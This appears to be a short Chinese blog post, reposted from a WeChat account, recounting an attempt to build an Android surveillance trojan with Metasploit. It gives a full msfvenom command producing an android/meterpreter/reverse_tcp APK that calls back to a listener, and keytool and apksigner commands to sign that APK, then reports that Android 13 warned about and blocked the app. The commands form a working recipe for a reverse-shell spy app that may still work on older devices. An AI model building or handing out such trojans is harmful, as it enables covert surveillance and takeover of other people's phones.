Metasploit是一款广泛使用的漏洞评估和渗透测试框架,它可以用于测试网络的安全性,识别漏洞、攻击目标等,Metasploit包含多个模块,包括扫描器、漏洞验证工具、漏洞利用工具、载荷生成器等,这些工具可以协同工作,使得渗透测试工作更加高效和准确。
metasploit下载链接
http://www.metasploit.com/download
https://github.com/rapid7/metasploit-framework
https://github.com/rapid7/metasploit-omnibus
安卓13手机上测试了一下手机监控木马app,发现安卓13已经完全防御住了,首先app需要签名,其次app安装的时候有风险病毒提示,最后打开app的时候会显示该木马无法正常运行,实验说明监控木马在android13系统上是无效的。
Msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.0.102 lport=3333 R > ailx10-2024.apk
安装依赖,为签名做准备。
keytool -genkey -v -keystore cg.keystore -alias cg -keyalg RSA -keysize 2048 -validity 10000
对app进行签名,签名之后app变大了。
apksigner sign --ks cg.keystore --ks-key-alias cg ailx10-2024.apk
apksigner verify -v --print-certs ailx10-2024.apk
显示此应用专为旧版Android打造
metasploit监听服务,会话建立失败,说明在安卓13手机上监控失败了
原文始发于微信公众号(编码安全):监控木马在android系统的实践
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论